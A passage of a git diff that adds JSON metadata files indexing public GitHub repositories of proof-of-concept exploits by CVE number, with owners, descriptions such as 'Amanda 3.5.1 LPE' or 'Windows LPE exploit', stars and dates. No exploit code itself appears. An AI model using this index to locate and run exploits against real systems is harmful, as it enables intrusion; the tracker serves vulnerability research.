newline at end of file diff --git a/2022/CVE-2022-37434.json b/2022/CVE-2022-37434.json new file mode 100644 index 0000000000..5a6ee11145 --- /dev/null +++ b/2022/CVE-2022-37434.json @@ -0,0 +1,95 @@ +[ + { + "id": 551717222, + "name": "CVE-2022-37434_poc", + "full_name": "xen0bit\/CVE-2022-37434_poc", + "owner": { + "login": "xen0bit", + "id": 21974988, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21974988?v=4", + "html_url": "https:\/\/github.com\/xen0bit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xen0bit\/CVE-2022-37434_poc", + "description": "u think that it doesnt but it do", + "fork": false, + "created_at": "2022-10-15T00:29:38Z", + "updated_at": "2024-10-29T11:15:07Z", + "pushed_at": "2022-10-15T00:46:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 751714869, + "name": "external_zlib_android-6.0.1_r22_CVE-2022-37434", + "full_name": "Trinadh465\/external_zlib_android-6.0.1_r22_CVE-2022-37434", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_zlib_android-6.0.1_r22_CVE-2022-37434", + "description": null, + "fork": false, + "created_at": "2024-02-02T06:57:18Z", + "updated_at": "2024-02-02T06:57:18Z", + "pushed_at": "2024-02-02T06:57:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 751878497, + "name": "external_zlib_CVE-2022-37434", + "full_name": "Trinadh465\/external_zlib_CVE-2022-37434", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_zlib_CVE-2022-37434", + "description": null, + "fork": false, + "created_at": "2024-02-02T14:25:28Z", + "updated_at": "2024-02-02T14:29:25Z", + "pushed_at": "2024-02-02T14:29:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37703.json b/2022/CVE-2022-37703.json new file mode 100644 index 0000000000..ef120611e0 --- /dev/null +++ b/2022/CVE-2022-37703.json @@ -0,0 +1,33 @@ +[ + { + "id": 536278901, + "name": "CVE-2022-37703", + "full_name": "MaherAzzouzi\/CVE-2022-37703", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-37703", + "description": "Amanda Information Disclosure bug.", + "fork": false, + "created_at": "2022-09-13T19:26:38Z", + "updated_at": "2023-03-28T02:55:32Z", + "pushed_at": "2022-09-13T19:29:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37704.json b/2022/CVE-2022-37704.json new file mode 100644 index 0000000000..3b0d7a9f39 --- /dev/null +++ b/2022/CVE-2022-37704.json @@ -0,0 +1,33 @@ +[ + { + "id": 556237054, + "name": "CVE-2022-37704", + "full_name": "MaherAzzouzi\/CVE-2022-37704", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-37704", + "description": "Amanda 3.5.1 LPE", + "fork": false, + "created_at": "2022-10-23T11:43:49Z", + "updated_at": "2023-02-22T11:07:22Z", + "pushed_at": "2022-10-23T11:45:14Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37705.json b/2022/CVE-2022-37705.json new file mode 100644 index 0000000000..3808394ad3 --- /dev/null +++ b/2022/CVE-2022-37705.json @@ -0,0 +1,33 @@ +[ + { + "id": 556238627, + "name": "CVE-2022-37705", + "full_name": "MaherAzzouzi\/CVE-2022-37705", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-37705", + "description": "Amanda 3.5.1 second LPE.", + "fork": false, + "created_at": "2022-10-23T11:48:36Z", + "updated_at": "2022-10-24T02:18:52Z", + "pushed_at": "2022-10-23T11:49:48Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37706.json b/2022/CVE-2022-37706.json new file mode 100644 index 0000000000..36f67a769a --- /dev/null +++ b/2022/CVE-2022-37706.json @@ -0,0 +1,219 @@ +[ + { + "id": 535818195, + "name": "CVE-2022-37706-LPE-exploit", + "full_name": "MaherAzzouzi\/CVE-2022-37706-LPE-exploit", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-37706-LPE-exploit", + "description": "A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)", + "fork": false, + "created_at": "2022-09-12T19:22:44Z", + "updated_at": "2024-11-21T05:23:30Z", + "pushed_at": "2022-09-19T19:41:34Z", + "stargazers_count": 300, + "watchers_count": 300, + "has_discussions": false, + "forks_count": 41, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 41, + "watchers": 300, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 538041124, + "name": "CVE-2022-37706", + "full_name": "ECU-10525611-Xander\/CVE-2022-37706", + "owner": { + "login": "ECU-10525611-Xander", + "id": 79676080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79676080?v=4", + "html_url": "https:\/\/github.com\/ECU-10525611-Xander", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ECU-10525611-Xander\/CVE-2022-37706", + "description": "All Credit to MaherAzzouzi (https:\/\/github.com\/MaherAzzouzi\/CVE-2022-37706-LPE-exploit). This is a copy of the exploit for CTFs", + "fork": false, + "created_at": "2022-09-18T08:04:08Z", + "updated_at": "2022-09-19T00:37:23Z", + "pushed_at": "2022-09-18T08:15:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809545292, + "name": "CVE-2022-37706", + "full_name": "junnythemarksman\/CVE-2022-37706", + "owner": { + "login": "junnythemarksman", + "id": 20056452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20056452?v=4", + "html_url": "https:\/\/github.com\/junnythemarksman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/junnythemarksman\/CVE-2022-37706", + "description": "Exploit created by nu11secur1ty (https:\/\/github.com\/nu11secur1ty\/CVE-mitre\/tree\/main\/CVE-2022-37706)", + "fork": false, + "created_at": "2024-06-03T01:17:04Z", + "updated_at": "2024-06-03T01:30:01Z", + "pushed_at": "2024-06-03T01:29:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824015559, + "name": "CVE-2022-37706", + "full_name": "AleksPwn\/CVE-2022-37706", + "owner": { + "login": "AleksPwn", + "id": 153509222, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153509222?v=4", + "html_url": "https:\/\/github.com\/AleksPwn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AleksPwn\/CVE-2022-37706", + "description": "The exploit is tested on Ubuntu 22.04", + "fork": false, + "created_at": "2024-07-04T07:42:37Z", + "updated_at": "2024-07-04T07:46:30Z", + "pushed_at": "2024-07-04T07:46:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831203901, + "name": "CVE-2022-37706-SUID", + "full_name": "TACTICAL-HACK\/CVE-2022-37706-SUID", + "owner": { + "login": "TACTICAL-HACK", + "id": 120341635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120341635?v=4", + "html_url": "https:\/\/github.com\/TACTICAL-HACK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TACTICAL-HACK\/CVE-2022-37706-SUID", + "description": "CVE-2022-37706-Enlightenment v0.25.3 - Privilege escalation", + "fork": false, + "created_at": "2024-07-19T23:12:40Z", + "updated_at": "2024-07-20T15:53:52Z", + "pushed_at": "2024-07-20T15:53:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844104873, + "name": "CVE-2022-37706", + "full_name": "sanan2004\/CVE-2022-37706", + "owner": { + "login": "sanan2004", + "id": 118365296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118365296?v=4", + "html_url": "https:\/\/github.com\/sanan2004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sanan2004\/CVE-2022-37706", + "description": "PoC", + "fork": false, + "created_at": "2024-08-18T11:57:58Z", + "updated_at": "2024-08-21T10:03:16Z", + "pushed_at": "2024-08-18T11:59:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855131874, + "name": "CVE-2022-37706", + "full_name": "KaoXx\/CVE-2022-37706", + "owner": { + "login": "KaoXx", + "id": 63966704, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63966704?v=4", + "html_url": "https:\/\/github.com\/KaoXx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KaoXx\/CVE-2022-37706", + "description": null, + "fork": false, + "created_at": "2024-09-10T11:14:10Z", + "updated_at": "2024-09-10T11:19:23Z", + "pushed_at": "2024-09-10T11:18:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37708.json b/2022/CVE-2022-37708.json new file mode 100644 index 0000000000..0ae116e481 --- /dev/null +++ b/2022/CVE-2022-37708.json @@ -0,0 +1,33 @@ +[ + { + "id": 540200274, + "name": "docker_lightman_exploit", + "full_name": "thekevinday\/docker_lightman_exploit", + "owner": { + "login": "thekevinday", + "id": 24626560, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24626560?v=4", + "html_url": "https:\/\/github.com\/thekevinday", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thekevinday\/docker_lightman_exploit", + "description": "Docker CVE-2022-37708", + "fork": false, + "created_at": "2022-09-22T23:06:08Z", + "updated_at": "2023-06-28T03:22:48Z", + "pushed_at": "2022-09-23T00:07:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3786.json b/2022/CVE-2022-3786.json new file mode 100644 index 0000000000..6623453fef --- /dev/null +++ b/2022/CVE-2022-3786.json @@ -0,0 +1,33 @@ +[ + { + "id": 587877422, + "name": "openssl-fuzz", + "full_name": "WhatTheFuzz\/openssl-fuzz", + "owner": { + "login": "WhatTheFuzz", + "id": 7316170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7316170?v=4", + "html_url": "https:\/\/github.com\/WhatTheFuzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WhatTheFuzz\/openssl-fuzz", + "description": "Finding CVE-2022-3786 (openssl) with Mayhem", + "fork": false, + "created_at": "2023-01-11T19:52:43Z", + "updated_at": "2024-10-21T08:35:46Z", + "pushed_at": "2023-01-11T19:55:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37969.json b/2022/CVE-2022-37969.json new file mode 100644 index 0000000000..bea58396c0 --- /dev/null +++ b/2022/CVE-2022-37969.json @@ -0,0 +1,33 @@ +[ + { + "id": 611938110, + "name": "CVE-2022-37969", + "full_name": "fortra\/CVE-2022-37969", + "owner": { + "login": "fortra", + "id": 117669217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117669217?v=4", + "html_url": "https:\/\/github.com\/fortra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fortra\/CVE-2022-37969", + "description": "Windows LPE exploit for CVE-2022-37969", + "fork": false, + "created_at": "2023-03-09T21:17:44Z", + "updated_at": "2024-11-06T16:36:19Z", + "pushed_at": "2023-07-11T16:50:28Z", + "stargazers_count": 130, + "watchers_count": 130, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 130, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38029.json b/2022/CVE-2022-38029.json new file mode 100644 index 0000000000..d607438701 --- /dev/null +++ b/2022/CVE-2022-38029.json @@ -0,0 +1,33 @@ +[ + { + "id": 880145667, + "name": "SIDECHANNEL-CVE-2022-38029", + "full_name": "SpiralBL0CK\/SIDECHANNEL-CVE-2022-38029", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/SIDECHANNEL-CVE-2022-38029", + "description": "SIDECHANNEL+CVE-2022-38029", + "fork": false, + "created_at": "2024-10-29T07:47:01Z", + "updated_at": "2024-11-11T13:17:36Z", + "pushed_at": "2024-10-29T07:52:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38181.json b/2022/CVE-2022-38181.json new file mode 100644 index 0000000000..14762e9d87 --- /dev/null +++ b/2022/CVE-2022-38181.json @@ -0,0 +1,95 @@ +[ + { + "id": 627438040, + "name": "CVE_2022_38181_Raven", + "full_name": "Pro-me3us\/CVE_2022_38181_Raven", + "owner": { + "login": "Pro-me3us", + "id": 106105250, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106105250?v=4", + "html_url": "https:\/\/github.com\/Pro-me3us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pro-me3us\/CVE_2022_38181_Raven", + "description": "CVE-2022-38181 POC for FireTV 2nd gen Cube (raven)", + "fork": false, + "created_at": "2023-04-13T13:19:04Z", + "updated_at": "2024-05-30T04:17:12Z", + "pushed_at": "2023-06-15T17:08:34Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 627440720, + "name": "CVE_2022_38181_Gazelle", + "full_name": "Pro-me3us\/CVE_2022_38181_Gazelle", + "owner": { + "login": "Pro-me3us", + "id": 106105250, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106105250?v=4", + "html_url": "https:\/\/github.com\/Pro-me3us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pro-me3us\/CVE_2022_38181_Gazelle", + "description": "CVE-2022-38181 POC for FireTV 3rd gen Cube (gazelle)", + "fork": false, + "created_at": "2023-04-13T13:25:09Z", + "updated_at": "2023-07-03T11:02:52Z", + "pushed_at": "2023-06-29T01:56:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 639906669, + "name": "CVE-2022-38181", + "full_name": "R0rt1z2\/CVE-2022-38181", + "owner": { + "login": "R0rt1z2", + "id": 39171306, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39171306?v=4", + "html_url": "https:\/\/github.com\/R0rt1z2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R0rt1z2\/CVE-2022-38181", + "description": null, + "fork": false, + "created_at": "2023-05-12T13:50:54Z", + "updated_at": "2024-10-04T17:59:18Z", + "pushed_at": "2023-07-03T20:49:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38374.json b/2022/CVE-2022-38374.json new file mode 100644 index 0000000000..958260863c --- /dev/null +++ b/2022/CVE-2022-38374.json @@ -0,0 +1,64 @@ +[ + { + "id": 570155803, + "name": "CVE-2022-38374", + "full_name": "azhurtanov\/CVE-2022-38374", + "owner": { + "login": "azhurtanov", + "id": 17701901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17701901?v=4", + "html_url": "https:\/\/github.com\/azhurtanov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/azhurtanov\/CVE-2022-38374", + "description": null, + "fork": false, + "created_at": "2022-11-24T13:13:08Z", + "updated_at": "2022-12-16T18:08:42Z", + "pushed_at": "2022-11-24T13:16:30Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 609274446, + "name": "CVE-2022-38374", + "full_name": "M4fiaB0y\/CVE-2022-38374", + "owner": { + "login": "M4fiaB0y", + "id": 95071636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95071636?v=4", + "html_url": "https:\/\/github.com\/M4fiaB0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M4fiaB0y\/CVE-2022-38374", + "description": null, + "fork": false, + "created_at": "2023-03-03T18:43:02Z", + "updated_at": "2023-03-04T02:51:43Z", + "pushed_at": "2023-03-03T18:46:21Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38553.json b/2022/CVE-2022-38553.json new file mode 100644 index 0000000000..52dfdf4d80 --- /dev/null +++ b/2022/CVE-2022-38553.json @@ -0,0 +1,33 @@ +[ + { + "id": 539043879, + "name": "CVE-2022-38553", + "full_name": "4websecurity\/CVE-2022-38553", + "owner": { + "login": "4websecurity", + "id": 114004967, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114004967?v=4", + "html_url": "https:\/\/github.com\/4websecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4websecurity\/CVE-2022-38553", + "description": "CROSS SITE SCRIPTING (XSS) ON \"ACADEMY LEARNING MANAGEMENT SYSTEM\" - PROOF OF CONCEPT (POC) CVE-2022-38553", + "fork": false, + "created_at": "2022-09-20T14:51:52Z", + "updated_at": "2022-09-24T12:42:03Z", + "pushed_at": "2022-09-20T15:41:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38577.json b/2022/CVE-2022-38577.json new file mode 100644 index 0000000000..05f30e6c3d --- /dev/null +++ b/2022/CVE-2022-38577.json @@ -0,0 +1,33 @@ +[ + { + "id": 539304215, + "name": "CVE-2022-38577-Processmaker", + "full_name": "sornram9254\/CVE-2022-38577-Processmaker", + "owner": { + "login": "sornram9254", + "id": 8232188, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8232188?v=4", + "html_url": "https:\/\/github.com\/sornram9254", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sornram9254\/CVE-2022-38577-Processmaker", + "description": "ProcessMaker before v3.5.4 was discovered to contain insecure permissions in the user profile page. This vulnerability allows attackers to escalate normal users to Administrators.", + "fork": false, + "created_at": "2022-09-21T04:29:42Z", + "updated_at": "2023-02-22T07:52:01Z", + "pushed_at": "2024-02-02T04:29:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38601.json b/2022/CVE-2022-38601.json new file mode 100644 index 0000000000..bf72d770f7 --- /dev/null +++ b/2022/CVE-2022-38601.json @@ -0,0 +1,33 @@ +[ + { + "id": 708832668, + "name": "CVE-2022-38601", + "full_name": "jet-pentest\/CVE-2022-38601", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2022-38601", + "description": "CVE-2022-38601", + "fork": false, + "created_at": "2023-10-23T13:34:53Z", + "updated_at": "2023-10-23T14:13:40Z", + "pushed_at": "2023-10-23T14:13:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38604.json b/2022/CVE-2022-38604.json new file mode 100644 index 0000000000..07182d2248 --- /dev/null +++ b/2022/CVE-2022-38604.json @@ -0,0 +1,54 @@ +[ + { + "id": 520518592, + "name": "CVE-2022-38604", + "full_name": "LucaBarile\/CVE-2022-38604", + "owner": { + "login": "LucaBarile", + "id": 74877659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74877659?v=4", + "html_url": "https:\/\/github.com\/LucaBarile", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucaBarile\/CVE-2022-38604", + "description": "Exploits and reports for CVE-2022-38604", + "fork": false, + "created_at": "2022-08-02T13:53:18Z", + "updated_at": "2024-03-02T17:42:10Z", + "pushed_at": "2023-04-05T13:35:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "arbitrary-file-deletion", + "denial-of-service", + "disclosure", + "elevation-of-privilege", + "exploit", + "impersonation", + "link-following", + "link-following-attack", + "local-privilege-escalation", + "mount-point", + "poc", + "proof-of-concept", + "symbolic-link", + "vulnerability", + "wacom", + "wacom-vulnerability", + "windows-denial-of-service", + "write-up", + "zero-day" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38691.json b/2022/CVE-2022-38691.json new file mode 100644 index 0000000000..a2680f40f5 --- /dev/null +++ b/2022/CVE-2022-38691.json @@ -0,0 +1,36 @@ +[ + { + "id": 725940437, + "name": "CVE-2022-38691_38692", + "full_name": "TomKing062\/CVE-2022-38691_38692", + "owner": { + "login": "TomKing062", + "id": 12976017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12976017?v=4", + "html_url": "https:\/\/github.com\/TomKing062", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TomKing062\/CVE-2022-38691_38692", + "description": "Let's control Secure Boot Chain ourselves.", + "fork": false, + "created_at": "2023-12-01T07:32:18Z", + "updated_at": "2024-11-21T13:57:52Z", + "pushed_at": "2024-02-20T09:05:59Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "spreadtrum", + "unisoc" + ], + "visibility": "public", + "forks": 10, + "watchers": 40, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38694.json b/2022/CVE-2022-38694.json new file mode 100644 index 0000000000..c7ccf48285 --- /dev/null +++ b/2022/CVE-2022-38694.json @@ -0,0 +1,67 @@ +[ + { + "id": 651833898, + "name": "CVE-2022-38694_unlock_bootloader", + "full_name": "TomKing062\/CVE-2022-38694_unlock_bootloader", + "owner": { + "login": "TomKing062", + "id": 12976017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12976017?v=4", + "html_url": "https:\/\/github.com\/TomKing062", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TomKing062\/CVE-2022-38694_unlock_bootloader", + "description": "This is a one-time signature verification bypass. For persistent signature verification bypass, check https:\/\/github.com\/TomKing062\/CVE-2022-38691_38692", + "fork": false, + "created_at": "2023-06-10T08:31:26Z", + "updated_at": "2024-11-27T23:22:53Z", + "pushed_at": "2024-08-01T15:09:15Z", + "stargazers_count": 298, + "watchers_count": 298, + "has_discussions": true, + "forks_count": 44, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "spreadtrum", + "unisoc" + ], + "visibility": "public", + "forks": 44, + "watchers": 298, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 820964383, + "name": "Bootloader_Unlock_Anbernic_T820", + "full_name": "TheGammaSqueeze\/Bootloader_Unlock_Anbernic_T820", + "owner": { + "login": "TheGammaSqueeze", + "id": 116582950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116582950?v=4", + "html_url": "https:\/\/github.com\/TheGammaSqueeze", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheGammaSqueeze\/Bootloader_Unlock_Anbernic_T820", + "description": "Bootloader unlock using CVE-2022-38694 for Anbernic Unisoc T820 devices", + "fork": false, + "created_at": "2024-06-27T14:28:13Z", + "updated_at": "2024-11-16T22:45:41Z", + "pushed_at": "2024-10-15T10:16:57Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 28, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38725.json b/2022/CVE-2022-38725.json new file mode 